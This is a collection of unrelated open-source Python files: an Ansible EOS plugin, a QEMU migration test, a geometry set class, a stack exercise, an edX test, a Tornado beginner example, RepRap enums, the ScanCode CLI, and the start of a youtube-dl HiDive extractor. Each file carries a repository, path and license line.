provider['port'] = self._play_context.port or default_port
if provider.get('timeout') is None:
provider['timeout'] = self._play_context.timeout
if provider.get('username') is None:
provider['username'] = self._play_context.connection_user
if provider.get('password') is None:
provider['password'] = self._play_context.password
if provider.get('authorize') is None:
provider['authorize'] = False
if provider.get('validate_certs') is None:
provider['validate_certs'] = ARGS_DEFAULT_VALUE['validate_certs']
self._task.args['provider'] = provider
result = super(ActionModule, self).run(tmp, task_vars)
return result
def _get_socket_path(self, play_context):
ssh = connection_loader.get('ssh', class_only=True)
cp = ssh._create_control_path(play_context.remote_addr, play_context.port, play_context.remote_user)
path = unfrackpath("$HOME/.ansible/pc")
return cp % dict(directory=path)
def load_provider(self):
provider = self._task.args.get('provider', {})
for key, value in iteritems(eos_argument_spec):
if key != 'provider' and key not in provider:
if key in self._task.args:
provider[key] = self._task.args[key]
elif 'fallback' in value:
provider[key] = self._fallback(value['fallback'])
elif key not in provider:
provider[key] = None
return provider
def _fallback(self, fallback):
strategy = fallback[0]
args = []
kwargs = {}
for item in fallback[1:]:
if isinstance(item, dict):
kwargs = item
else:
args = item
try:
return strategy(*args, **kwargs)
except AnsibleFallbackNotFound:
pass
| Inspq/ansible | lib/ansible/plugins/action/eos.py | Python | gpl-3.0 | 6,406 |
import logging
import time
from autotest.client.shared import error, utils
from virttest import utils_test
from autotest.client.shared.syncdata import SyncData
@error.context_aware
def run(test, params, env):
"""
KVM multi-host migration test:
Migration execution progress is described in documentation
for migrate method in class MultihostMigration.
:param test: kvm test object.
:param params: Dictionary with test parameters.
:param env: Dictionary with the test environment.
"""
mig_protocol = params.get("mig_protocol", "tcp")
base_class = utils_test.qemu.MultihostMigration
if mig_protocol == "fd":
base_class = utils_test.qemu.MultihostMigrationFd
if mig_protocol == "exec":
base_class = utils_test.qemu.MultihostMigrationExec
if "rdma" in mig_protocol:
base_class = utils_test.qemu.MultihostMigrationRdma
class TestMultihostMigration(base_class):
def __init__(self, test, params, env):
super(TestMultihostMigration, self).__init__(test, params, env)
self.srchost = self.params.get("hosts")[0]
self.dsthost = self.params.get("hosts")[1]
self.vms = params["vms"].split()
self.migrate_count = int(params.get("migrate_count", "1"))
self.migration_timeout = int(params.get("migrate_timeout", "240"))
self.time_command = params["time_command"]
self.time_filter_re = params["time_filter_re"]
self.time_format = params["time_format"]
self.create_file = params["create_file"]
self.diff_limit = float(params.get("time_diff_limit", "0.1"))
self.start_ht = {}
self.start_gt = {}
self.diff_ht = {}
self.diff_gt = {}
self.id = {'src': self.srchost,
'dst': self.dsthost,
"type": "timedrift"}
self.sync = SyncData(self.master_id(), self.hostid, self.hosts,
self.id, self.sync_server)
def check_diff(self, mig_data):
logging.debug("Sleep 10s")
time.sleep(10)
time_drifted = False
for vm in mig_data.vms:
session = vm.wait_for_login()
(ht, gt) = utils_test.get_time(session, self.time_command,
self.time_filter_re,
self.time_format)
session.cmd(self.create_file)
if vm.name not in self.start_ht.keys():
(self.start_ht[vm.name], self.start_gt[vm.name]) = (ht, gt)
if abs(ht - gt) > self.diff_limit:
logging.warning("Host and %s time diff %s is greater "
"than time_diff_limit:%s" %
(vm.name, abs(ht - gt),
self.diff_limit))
logging.warning("Host time:%s Guest %s time:%s" %
(ht, vm.name, gt))
else:
self.diff_ht[vm.name] = ht - self.start_ht[vm.name]
self.diff_gt[vm.name] = gt - self.start_gt[vm.name]
gh_diff = self.diff_ht[vm.name] - self.diff_gt[vm.name]
if gh_diff > self.diff_limit:
time_drifted = True
if time_drifted:
difs = ""
for vm in mig_data.vms:
difs += ("\n VM=%s HOST=%ss GUEST=%ss"
" DIFF=%s" %
(vm.name, self.diff_ht[vm.name],
self.diff_gt[vm.name],
(self.diff_ht[vm.name] -
self.diff_gt[vm.name])))
raise error.TestError("Time DIFFERENCE for VM is greater than"
" LIMIT:%ss.%s\n" % (self.diff_limit,
difs))
def before_migration(self, mig_data):
"""
Sync time values
"""
data = self.sync.sync((self.start_ht, self.start_gt), timeout=120)
(self.start_ht, self.start_gt) = data[self.srchost]
def ping_pong_migrate(self):
for _ in range(self.migrate_count):
logging.info("File transfer not ended, starting"
" a round of migration...")
self.sync.sync(True, timeout=self.migration_timeout)
self.migrate_wait(self.vms, self.srchost, self.dsthost,
start_work=self.check_diff,
check_work=self.check_diff)
tmp = self.dsthost
self.dsthost = self.srchost
self.srchost = tmp
def migration_scenario(self, worker=None):
error.context("Migration from %s to %s over protocol %s." %
(self.srchost, self.dsthost, mig_protocol),
logging.info)
self.ping_pong_migrate()
sync_cmd = params.get("host_sync_time_cmd", "ntpdate -b pool.ntp.org")
utils.run(sync_cmd, 20)
mig = TestMultihostMigration(test, params, env)
mig.run()
| uni-peter-zheng/tp-qemu | qemu/tests/migration_multi_host_timedrift.py | Python | gpl-2.0 | 5,402 |
from copy import copy, deepcopy
from object import Object
class CantBeFrozenException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class ElemSizeException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class UnmatchedPropertiesException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class Set(object):
def __init__(self):
self.elems = list()
self.prps = dict()
self.extend_prps = dict()
self.elem_prp_keys = list()
self.elem_extend_prps = dict()
self.elem_degree = 0
def first_set(self, num_elems, elem_degree):
self.elems = list()
self.prps = dict()
self.extend_prps = dict()
self.elem_prp_keys = list()
self.elem_extend_prps = dict()
for elem_i in range(num_elems):
self.elems.append(Object(elem_degree))
for elem_elem_i in range(elem_degree):
base = elem_i * 100 + elem_elem_i * 10
self.elems[elem_i].vector[elem_elem_i] = (base + 1, base + 2, base + 3)
for prop_i in range(5):
self.elems[elem_i].prps['ELEM_PROP_' + str(prop_i+1)] = elem_i * 100.0 + (prop_i+1) * .1 + 0.001;
for prop_i in range(5):
self.elem_prp_keys.append('ELEM_PROP_' + str(prop_i+1))
self.prps['PROP_' + str(prop_i+1)] = (prop_i+1) * 1.1 + 0.001
for i in range(1,6):
self.add_extend_elem_prop("EXT_ELEM_PROP_" + str(i),"NaN")
for j in range(len(self.elems)):
self.set_extend_elem_prop("EXT_ELEM_PROP_" + str(i), "Ooogle " + str(i) + "-" + str(j), j)
self.elem_degree = elem_degree
def second_set(self, num_elems, elem_degree):
self.elems = list()
self.prps = dict()
self.extend_prps = dict()
self.elem_prp_keys = list()
self.elem_extend_prps = dict()
for elem_i in range(num_elems):
self.elems.append(Object(elem_degree))
for elem_elem_i in range(elem_degree):
base = elem_i * 100 + elem_elem_i * 10
self.elems[elem_i].vector[elem_elem_i] = (-(base + 1), -(base + 2), -(base + 3))
for prop_i in range(5):
self.elems[elem_i].prps['ELEM_PROP_' + str(prop_i+1)] = -(elem_i * 100.0 + (prop_i+1) * .1 + 0.001);
for prop_i in range(5):
self.elem_prp_keys.append('ELEM_PROP_' + str(prop_i+1))
self.prps['PROP_' + str(prop_i+1)] = -((prop_i+1) * 1.1 + 0.001)
for i in range(6,11):
self.add_extend_elem_prop("EXT_ELEM_PROP_" + str(i),"NaN")
for j in range(len(self.elems)):
self.set_extend_elem_prop("EXT_ELEM_PROP_" + str(i), "Boogle " + str(i) + "-" + str(j), j)
self.elem_degree = elem_degree
def __str__(self):
string = ''
if self.extend_prps:
string = string + '('
for key_val in sorted(self.extend_prps.items()):
string = string + key_val[0] + ': ' + str(key_val[1]) + ', '
if self.extend_prps:
string = string + ')\n'
string = string + '\n'
for (key,val) in sorted(self.prps.items()):
string = string + key + ': ' + str(val) + '\n'
elem_i = 0
for elem in self.elems:
string = string + '\n--------------------\n'
string = string + ' %d\n' % elem_i
string = string + '--------------------\n'
if elem.extend_prps:
string = string + '{'
count = 0
for (key,val) in sorted(elem.extend_prps.items()):
string = string + key + ': ' + str(val)
count = count + 1
if count != len(elem.extend_prps):
string = string + ', '
if elem.extend_prps:
string = string + '}\n'
string = string + '\n'
string = string + str(elem)
string = string + '\n'
elem_i = elem_i + 1
return string
#=====================================================================================================================
# Set functions
#=====================================================================================================================
def elem_resize(self, new_size, value):
for elem_i in range(self.size()):
elem_degree = len(self.elems[elem_i].vector)
for i in range(elem_degree,new_size):
self.elems[elem_i].vector.append((value,value,value))
for i in range(elem_degree-1,new_size-1,-1):
self.elems[elem_i].vector.pop(i)
self.elem_degree = new_size
def push_back(self, elem, ext_prop_row=dict()):
# Make a copy of the element and reset its extended properties
append_elem = deepcopy(elem)
append_elem.extend_prps = dict()
# Loop through the keys present in the set
for key in self.elem_extend_prps.keys():
if ext_prop_row:
# Use the properties explicitly provided
if ext_prop_row.has_key(key):
append_elem.extend_prps[key] = ext_prop_row[key]
else:
append_elem.extend_prps[key] = self.elem_extend_prps[key]
else:
# Copy across only the extended properties present in the set, and populate the missing extended properties with defaults.
if elem.extend_prps.has_key(key):
append_elem.extend_prps[key] = elem.extend_prps[key]
else:
append_elem.extend_prps[key] = self.elem_extend_prps[key]
self.elems.append(append_elem)
def erase(self, index):
self.elems.pop(index)
def insert(self, elem, index):
# Make a copy of the element and reset its extended properties
insert_elem = deepcopy(elem)
insert_elem.extend_prps = dict()
# Loop through the keys present in the set
for key in self.elem_extend_prps.keys():
# Copy across only the extended properties present in the set, and populate the missing extended properties with defaults.
if elem.extend_prps.has_key(key):
insert_elem.extend_prps[key] = elem.extend_prps[key]
else:
insert_elem.extend_prps[key] = self.elem_extend_prps[key]
self.elems.insert(index, insert_elem)
def append(self, set):
if self.elem_prp_keys != set.elem_prp_keys or self.prps != set.prps:
raise UnmatchedPropertiesException ('properties do not match')
if self.elem_degree and self.elem_degree != set.elem_degree:
raise ElemSizeException ('Element sizes do not match')
for elem in set.elems:
self.push_back(elem)
def get_extend_elem_prop_header(self):
return sorted(self.elem_extend_prps.keys())
def get_elem_prop_header(self):
return sorted(self.elem_prp_keys)
def add_extend_elem_prop(self, key, default_value):
if not self.elem_extend_prps.has_key(key):
for elem in self.elems:
elem.extend_prps[key] = default_value
self.elem_extend_prps[key] = default_value
def add_extend_elem_props(self,set):
for (key,val) in set.elem_extend_prps.items():
self.add_extend_elem_prop(key,val)
def clear_extend_elem_props(self):
self.elem_extend_prps = dict()
for elem in self.elems:
elem.extend_prps = dict()
def remove_extend_elem_prop(self, key):
self.elem_extend_prps.pop(key,None)
for elem in self.elems:
elem.extend_prps.pop(key,None)
#######################
def set_extend_elem_prop(self,key,value,index):
self.elems[index].extend_prps[key] = value
def get_extend_elem_prop(self,key,index):
return self.elems[index].extend_prps[key]
def has_extend_elem_prop(self,key):
return self.elem_extend_prps.keys().count(key)
def get_extend_elem_prop_row(self,index):
return self.elems[index].extend_prps
def set_extend_elem_prop_row(self,prop_row,index):
this_props = self.elems[index].extend_prps
# Loop through the keys present in the set
for key in self.elem_extend_prps.keys():
# Copy across only the extended properties present in the set, and populate the missing extended properties with defaults.
if prop_row.has_key(key):
this_props[key] = prop_row[key]
else:
this_props[key] = self.elem_extend_prps[key]
def copy_extend_elem_prop_row(self,set,their_index,this_index):
self.set_extend_elem_prop_row(set.get_extend_elem_prop_row(their_index),this_index)
def copy_extend_elem_props(self,set):
self.elem_extend_prps = copy(set.elem_extend_prps)
for (this_elem,their_elem) in zip(self.elems,set.elems):
this_elem.extend_prps = copy(their_elem.extend_prps)
def append_extend_elem_props(self,set):
for (key,val) in set.elem_extend_prps.items():
# if key not in self.elem_extend_prps:
self.elem_extend_prps[key] = val
for (this_elem,their_elem) in zip(self.elems,set.elems):
this_elem.extend_prps[key] = their_elem.extend_prps[key]
def add_elem_prop(self,key,value):
if key not in self.elem_prp_keys:
self.elem_prp_keys.append(key)
for elem in self.elems:
elem.prps[key] = value
def has_elem_prop(self,key):
return self.elem_prp_keys.count(key)
def remove_elem_prop(self,key,ignore_missing=True):
try:
self.elem_prp_keys.remove(key)
except ValueError:
if not ignore_missing:
raise Exception ("Could not remove element property '%s' as it was not present" % key)
for elem in self.elems:
elem.prps.pop(key,None)
def clear_elem_props(self):
self.elem_prp_keys = list()
for elem in self.elems:
elem.prps = dict()
def elem_prop_index(self,key):
keys = sorted(self.elem_prp_keys)
for i in range(len(keys)):
if keys[i] == key:
return i
raise Exception ("Key (" + key + ") was not found.")
def elem_prop_name(self, index):
keys = sorted(self.elem_prp_keys)
return keys[index]
def elem_prop_keys(self):
keys = sorted(self.elem_prp_keys)
return keys
def freeze_elem_degree(self):
if self.size():
elem_degree = self.elems[0].size()
for elem in self.elems:
if elem.size() != elem_degree:
raise CantBeFrozenException ("Elements not all the same size")
self.elem_degree = elem_degree
def free_elem_degree(self):
self.elem_degree = 0
def resize(self, new_size, fill_value, new_elem_degree=0):
if self.elem_degree:
if new_elem_degree:
raise Exception ("'new_elem_degree' parameter can only be supplied when element size is variable.");
elem_degree = self.elem_degree
else:
elem_degree = new_elem_degree
old_size = self.size()
for i in range(old_size,new_size):
object = Object(elem_degree,fill_value)
for key in self.elem_prp_keys:
object.prps[key] = fill_value
for (key,val) in self.elem_extend_prps.items():
object.extend_prps[key] = val
self.elems.append(object)
for i in range(old_size-1,new_size-1,-1):
self.elems.pop(i)
def clear(self):
self.elems = list()
self.extend_prps = dict()
self.elem_extend_prps = dict()
def size(self):
return len(self.elems)
def num_props(self):
return len(self.prps)
def num_elem_props(self):
return len(self.elem_prp_keys)
def num_extend_elem_props(self):
return len(self.elem_extend_prps)
def vsize(self):
return self.bsize() + self.num_props()
def bsize(self):
base_size = 0
for elem in self.elems:
base_size = base_size + elem.size() * 3 + elem.num_props()
return base_size
def add_prop(self, prop_key,value):
if self.prps.has_key(prop_key):
raise Exception ("'" + prop_key + "' property already present.")
self.prps[prop_key] = value
def has_prop(self, prop_key):
return int(self.prps.has_key(prop_key))
def remove_prop(self, prop_key):
if self.prps.pop(prop_key,-9999) == -9999:
raise Exception ("key + (" + prop_key + ") was not found, use 'ignore_missing' to ignore.")
def clear_props(self):
self.prps.clear()
def prop_index(self, prop_key):
keys = sorted(self.prps.keys())
for prop_i in range(len(keys)):
if prop_key == keys[prop_i]:
return prop_i
raise Exception ("Key '" + str(prop_key) + "' not found.")
# def prop(self, index):
#
# keys = sorted(self.prps.keys())
#
# return self.prps[keys[index]]
def prop_name(self, index):
return sorted(self.prps.keys())[index]
def prop_keys(self):
return sorted(self.prps.keys())
def prop(self, key):
return self.prps[key]
| tclose/FouTS | python/fouts/fibre/base/set.py | Python | gpl-3.0 | 13,285 |
# pylint: disable=R0903
"""
Write a program which implements a stack interface for integers. The interface
should have ‘push’ and ‘pop’ functions. Your task is to ‘push’ a series of
integers and then ‘pop’ and print every alternate integer.
INPUT SAMPLE:
Your program should accept a file as its first argument. The file contains a
series of space delimited integers, one per line.
For example:
1 2 3 4
10 -2 3 4
OUTPUT SAMPLE:
Print to stdout every alternate space delimited integer, one per line.
For example:
4 2
4 -2
"""
from sys import argv
INPUT_FILE = argv[1]
def parse_input(input_file):
"""Read each line of a file and do stuff with it"""
with open(input_file, mode="r") as file:
for line in file:
ints = [int(x) for x in line.split()]
working_stack = Stack()
# Push the numbers, pop off and print the alternates
pointer = 1 # used to determine "every other" status
for number in ints:
working_stack.push(number)
while True:
try:
if pointer % 2: # print only odd number pointer items
print(working_stack.pop(), end=" ")
else:
working_stack.pop()
pointer += 1
except ValueError:
break
print()
class Stack:
"""Implements a stack data structure"""
def __init__(self):
self.top = None
def push(self, data):
"""Take a data element and put it on the top of the stack"""
self.top = Item(data, self.top)
def pop(self):
"""Remove the top item from the stack, and return the value of it"""
prev_top = self.top
try:
self.top = self.top.next_item
except AttributeError:
raise ValueError("The stack is empty")
return prev_top.data
class Item:
"""Wrapper for a data item that get pushed on the stack"""
def __init__(self, data, next_item=None):
self.data = data
self.next_item = next_item
if __name__ == '__main__':
parse_input(INPUT_FILE)
| joelstanner/codeeval | python_solutions/STACK_IMPLEMENTATION/stack_implementation.py | Python | mit | 2,183 |
"""
Tests for send_email_base_command
"""
import datetime
from unittest import skipUnless
import ddt
import pytz
from django.conf import settings
from mock import DEFAULT, Mock, patch
from openedx.core.djangoapps.schedules.management.commands import SendEmailBaseCommand
from openedx.core.djangoapps.site_configuration.tests.factories import SiteConfigurationFactory, SiteFactory
from openedx.core.djangolib.testing.utils import CacheIsolationTestCase, skip_unless_lms
@ddt.ddt
@skip_unless_lms
@skipUnless('openedx.core.djangoapps.schedules.apps.SchedulesConfig' in settings.INSTALLED_APPS,
"Can't test schedules if the app isn't installed")
class TestSendEmailBaseCommand(CacheIsolationTestCase): # lint-amnesty, pylint: disable=missing-class-docstring
def setUp(self): # lint-amnesty, pylint: disable=super-method-not-called
self.command = SendEmailBaseCommand()
self.site = SiteFactory()
self.site_config = SiteConfigurationFactory.create(site=self.site)
def test_handle(self):
with patch.object(self.command, 'send_emails') as send_emails:
self.command.handle(site_domain_name=self.site.domain, date='2017-09-29')
send_emails.assert_called_once_with(
self.site,
datetime.datetime(2017, 9, 29, tzinfo=pytz.UTC),
None
)
def test_weeks_option(self):
with patch.object(self.command, 'enqueue') as enqueue:
self.command.handle(site_domain_name=self.site.domain, date='2017-09-29', weeks=12)
assert enqueue.call_count == 12
def test_send_emails(self):
with patch.multiple(
self.command,
offsets=(1, 3, 5),
enqueue=DEFAULT,
):
arg = Mock(name='arg')
kwarg = Mock(name='kwarg')
self.command.send_emails(arg, kwarg=kwarg)
assert not arg.called
assert not kwarg.called
for offset in self.command.offsets:
self.command.enqueue.assert_any_call(offset, arg, kwarg=kwarg) # lint-amnesty, pylint: disable=no-member
| stvstnfrd/edx-platform | openedx/core/djangoapps/schedules/management/commands/tests/test_send_email_base_command.py | Python | agpl-3.0 | 2,135 |
import textwrap
import tornado.httpserver
import tornado.ioloop
import tornado.options
import tornado.web
from tornado.options
# Just learning Yo!
import define, options
define("port", default=8000, help="run on the given port", type=int)
# Handlers that manipulate strings
class ReverseHandler(tornado.web.RequestHandler):
def get(self, input):
self.write(input[::-1])
class WrapHandler(tornado.web.RequestHandler):
def post(self):
text = self.get_argument('text')
width = self.get_argument('width', 40)
self.write(textwrap.fill(text, width))
# Run only if started as the main file
if __name__ == "__main__":
tornado.options.parse_command_line()
app = tornado.web.Application(
handlers=[
(r"/reverse/(\w+)", ReverseHandler),
(r"/wrap", WrapHandler)
]
)
http_server = tornado.httpserver.HTTPServer(app) http_server.listen(options.port) tornado.ioloop.IOLoop.instance().start() | Wojtechnology/Muzit | learning/strings.py | Python | apache-2.0 | 908 |
class RepRapEventEnum:
PRINT_COMPLETE = 10
PRINT_STOPPED = 11
PRINT_STARTED = 13
PRINT_RESUMED = 14
PRINT_SENDGCODE = 15
QUEUE_DRAINED = 16
RECEIVED_MSG = 17
CONNECTED = 20
DISCONNECTED = 21
PRINT_ERROR = 99
class RepRapCmdEnum:
CMD_GCODE = 1
CMD_STARTPRINT = 2
CMD_STOPPRINT = 3
CMD_DRAINQUEUE = 4
CMD_ENDOFPRINT = 5
CMD_RESUMEPRINT = 6
class RepRapLogEnum:
LOG_NONE = 0
LOG_CMD = 1
LOG_ALL = 2 | jbernardis/repraptoolbox | src/reprapenums.py | Python | gpl-3.0 | 417 |
#
# Copyright (c) 2015 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import print_function, absolute_import
import os
from functools import partial
import json
import click
from commoncode.fileutils import file_iter
from commoncode import ignore
from scancode import __version__ as version
from scancode.api import as_html
from scancode.api import as_html_app
from scancode.api import create_html_app_assets
from scancode.api import extract_archives
from scancode.api import get_copyrights
from scancode.api import get_licenses
from scancode.api import HtmlAppAssetCopyWarning
from scancode.api import HtmlAppAssetCopyError
info_text = '''
ScanCode scans code and other files for origin and license.
Visit https://github.com/nexB/scancode-toolkit/ for support and download.
'''
# FIXME: we should load NOTICE instead
notice_text = '''
Software license
================
Copyright (c) 2015 nexB Inc. and others. All rights reserved.
http://nexb.com and https://github.com/nexB/scancode-toolkit/
The ScanCode software is licensed under the Apache License version 2.0.
Data generated with ScanCode require an acknowledgment.
ScanCode is a trademark of nexB Inc.
You may not use this software except in compliance with the License.
You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed
under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
When you publish or redistribute any data created with ScanCode or any ScanCode
derivative work, you must accompany this data with the following acknowledgment:
'''
acknowledgment_text = '''
Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
OR CONDITIONS OF ANY KIND, either express or implied. No content created from
ScanCode should be considered or used as legal advice. Consult an Attorney
for any legal advice.
ScanCode is a free software code scanning tool from nexB Inc. and others.
Visit https://github.com/nexB/scancode-toolkit/ for support and download.
'''
acknowledgment_text_json = acknowledgment_text.strip().replace(' ', '')
extra_notice_text = '''
Third-party software licenses
=============================
ScanCode embeds third-party free and open source software packages under various
licenses including copyleft licenses. Some of the third-party software packages
are delivered as pre-built binaries. The origin and license of these packages is
documented by .ABOUT files.
The corresponding source code for pre-compiled third-party software is available
for immediate download from the same release page where you obtained ScanCode at:
https://github.com/nexB/scancode-toolkit/
or https://github.com/nexB/scancode-thirdparty-src/
You may also contact us to request the source code by email at info@nexb.com or
by postal mail at:
nexB Inc., ScanCode open source code request
735 Industrial Road, Suite #101, 94070 San Carlos, CA, USA
Please indicate in your communication the ScanCode version for which you are
requesting source code.
License for ScanCode datasets
=============================
ScanCode includes datasets (e.g. for license detection) that are dedicated
to the Public Domain using the Creative Commons CC0 1.0 Universal (CC0 1.0)
Public Domain Dedication: http://creativecommons.org/publicdomain/zero/1.0/
'''
def print_about(ctx, param, value):
if not value or ctx.resilient_parsing:
return
click.echo(info_text + notice_text + acknowledgment_text + extra_notice_text)
ctx.exit()
examples_text = '''
Scancode command lines examples:
(Note for Windows: use '\\' back slash instead of '/' forward slash for paths.)
Scan the 'samples' directory for licenses and copyrights. Save scan results to
an HTML app file for interactive scan results navigation. When the scan is done,
open 'scancode_result.html' in your web browser. Note that additional app files
are saved in a directory named 'scancode_result_files':
scancode --format html-app samples/ scancode_result.html
Scan a directory for licenses and copyrights. Save scan results to an
HTML file:
scancode --format html samples/zlib scancode_result.html
Scan a single file for copyrights. Print scan results on terminal as JSON:
scancode --copyright samples/zlib/zlib.h
Scan a single file for licenses, print verbose progress on terminal as each file
is scanned. Save scan to a JSON file:
scancode --license --verbose samples/zlib/zlib.h licenses.json
Scan a directory explicitly for licenses and copyrights. Redirect JSON scan
results to a file:
scancode -f json -l -c samples/zlib/ > scan.json
Extract all archives found in the 'samples' directory tree:
scancode --extract samples
Note: If an archive contains other archives, all contained archives will be
extracted recursively. Extraction is done directly in the 'samples' directory,
side-by-side with each archive. Files are extracted in a directory named after
the archive with an '-extract' suffix added to its name, created side-by-side
with the corresponding archive file.
Extract a single archive. Files are extracted in the directory
'samples/arch/zlib.tar.gz-extract/':
scancode --extract samples/arch/zlib.tar.gz
'''
def print_examples(ctx, param, value):
if not value or ctx.resilient_parsing:
return
click.echo(examples_text)
ctx.exit()
def print_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
click.echo('ScanCode version ' + version)
ctx.exit()
epilog_text = '''\b\bExamples (use --examples for more):
\b
Scan the 'samples' directory for licenses and copyrights.
Save scan results to a JSON file:
scancode --format json samples scancode_result.json
\b
Scan the 'samples' directory for licenses and copyrights. Save scan results to
an HTML app file for interactive web browser results navigation. Additional app
files are saved to the 'myscan_files' directory:
scancode --format html-app samples myscan.html
Note: when you run scancode, a progress bar is displayed with a counter of the
number of files processed. Use --verbose to display file-by-file progress.
'''
short_help = '''Usage: scancode [OPTIONS] <input> <output_file>
Try 'scancode --help' for help on options and arguments.'''
formats = ['json', 'html', 'html-app']
class ScanCommand(click.Command):
"""
Workaround click 4.0 bug https://github.com/mitsuhiko/click/issues/365
"""
def get_usage(self, ctx):
return short_help
@click.command(name='scancode', epilog=epilog_text, cls=ScanCommand)
@click.pass_context
@click.argument('input', metavar='<input>', type=click.Path(exists=True, readable=True))
@click.argument('output_file', default='-', metavar='<output_file>', type=click.File('wb'))
@click.option('-c', '--copyright', is_flag=True, default=False, help='Scan <input> for copyrights. [default]')
@click.option('-l', '--license', is_flag=True, default=False, help='Scan <input> for licenses. [default]')
@click.option('-f', '--format', metavar='<style>', type=click.Choice(formats),
default='json', show_default=True,
help='Set <output_file> format <style> to one of: %s' % ' or '.join(formats),
)
@click.option('-e', '--extract', is_flag=True, default=False, is_eager=True,
help=('Extract any archives and compressed files found in <input> recursively, in-place, ignoring other scan options. Use this before scanning proper, as an <input> preparation step.'))
@click.option('--verbose', is_flag=True, default=False, help='Print verbose file-by-file progress messages.')
@click.help_option('-h', '--help')
@click.option('--examples', is_flag=True, is_eager=True, callback=print_examples,
help=('Show command examples and exit.'))
@click.option('--about', is_flag=True, is_eager=True, callback=print_about,
help=('Show information about ScanCode and licensing and exit.'))
@click.option('--version', is_flag=True, is_eager=True, callback=print_version,
help=('Show the version and exit.'))
def scancode(ctx, input, output_file, extract, copyright, license, format, verbose, *args, **kwargs):
"""scan the <input> file or directory for origin and license and save results to the <output_file>.
The scan results are printed on terminal if <output_file> is not provided.
"""
abs_input = os.path.abspath(os.path.expanduser(input))
scans = [copyright, license]
if extract:
if any(scans):
# exclusive, ignoring other options.
# FIXME: this should turned into a sub-command
ctx.fail('''The '--extract' option cannot be combined with other scanning options.
Use the '--extract' option alone to extract archives found in <input>.
then run scancode again to scan the extracted files.''')
ctx.exit(1)
click.secho('Extracting archives...', fg='green')
extract_with_progress(abs_input, verbose)
click.secho('Extracting done.', fg='green')
return
# Default scan when no options is provided
if not any(scans):
copyright = True
license = True
if copyright or license:
click.secho('Scanning files...', fg='green')
results = []
ignored = partial(ignore.is_ignored, ignores=ignore.ignores_VCS, unignores={})
files = file_iter(abs_input, ignored=ignored)
if not verbose:
# only display a progress bar
with click.progressbar(files, show_pos=True) as files:
for input_file in files:
results.append(scan_one(input_file, copyright, license, verbose))
else:
for input_file in file_iter(files):
results.append(scan_one(input_file, copyright, license, verbose))
if format == 'html':
output_file.write(as_html(results))
elif format == 'html-app':
output_file.write(as_html_app(results, input, output_file))
try:
create_html_app_assets(output_file)
except HtmlAppAssetCopyWarning:
click.secho('\nHTML app creation skipped when printing to terminal.',
fg='yellow')
except HtmlAppAssetCopyError:
click.secho('\nFailed to create HTML app.', fg='red')
elif format == 'json':
meta = {
'count': len(results),
'notice': acknowledgment_text_json,
'results': results,
'version': version,
}
output_file.write(json.dumps(meta, indent=2, sort_keys=True))
else:
# This should never happen by construction
raise Exception('Unknown format: ' + repr(format))
click.secho('Scanning done.', fg='green')
def scan_one(input_file, copyright, license, verbose=False):
"""
Scan one file and return scanned data.
"""
if verbose:
click.secho('Scanning: %(input_file)s: ' % locals(), nl=False, fg='blue')
data = {'location': input_file}
if copyright:
if verbose:
click.secho('copyrights. ', nl=False, fg='green')
data['copyrights'] = list(get_copyrights(input_file))
if license:
if verbose:
click.secho('licenses. ', nl=False, fg='green')
data['licenses'] = list(get_licenses(input_file))
if verbose:
click.secho('', nl=True)
return data
def extract_with_progress(input, verbose=False):
"""
Extract archives and display progress.
"""
if verbose:
for xev in extract_archives(input, verbose=verbose):
if not xev.done:
click.secho('Extracting: ' + xev.source + ': ', nl=False, fg='green')
else:
if xev.warnings or xev.errors:
click.secho('done.', fg='red' if xev.errors else 'yellow')
display_extract_event(xev)
else:
click.secho('done.', fg='green')
else:
extract_results = []
# only display a progress bar
with click.progressbar(extract_archives(input, verbose=verbose), show_pos=True) as extractions:
for xevent in extractions:
extract_results.append(xevent)
# display warnings/errors at the end
for xev in extract_results:
if xev.warnings or xev.errors:
if xev.warnings or xev.errors:
click.secho('Extracting: ' + xev.source + ': ', nl=False, fg='green')
click.secho('done.', fg='red' if xev.errors else 'yellow')
display_extract_event(xev)
def display_extract_event(xev):
for e in xev.errors:
click.secho(' ERROR: ' + e, fg='red')
for warn in xev.warnings:
click.secho(' WARNING: ' + warn, fg='yellow')
| retrography/scancode-toolkit | src/scancode/cli.py | Python | apache-2.0 | 14,382 |
# coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..compat import compat_str
from ..utils import (
ExtractorError,
int_or_none,
urlencode_postdata,
)
class HiDiveIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?hidive\.com/stream/(?P<title>[^/]+)/(?P<key>[^/?#&]+)'
# Using X-Forwarded-For results in 403 HTTP error for HLS fragments,
# so disabling geo bypass completely
_GEO_BYPASS = False
_TESTS = [{
'url': 'https://www.hidive.com/stream/the-comic-artist-and-his-assistants/s01e001',
'info_dict': {
'id': 'the-comic-artist-and-his-assistants/s01e001',
'ext': 'mp4',
'title': 'the-comic-artist-and-his-assistants/s01e001',
'series': 'the-comic-artist-and-his-assistants',
'season_number': 1,
'episode_number': 1,
},
'params': {
'skip_download': True,
},
}]
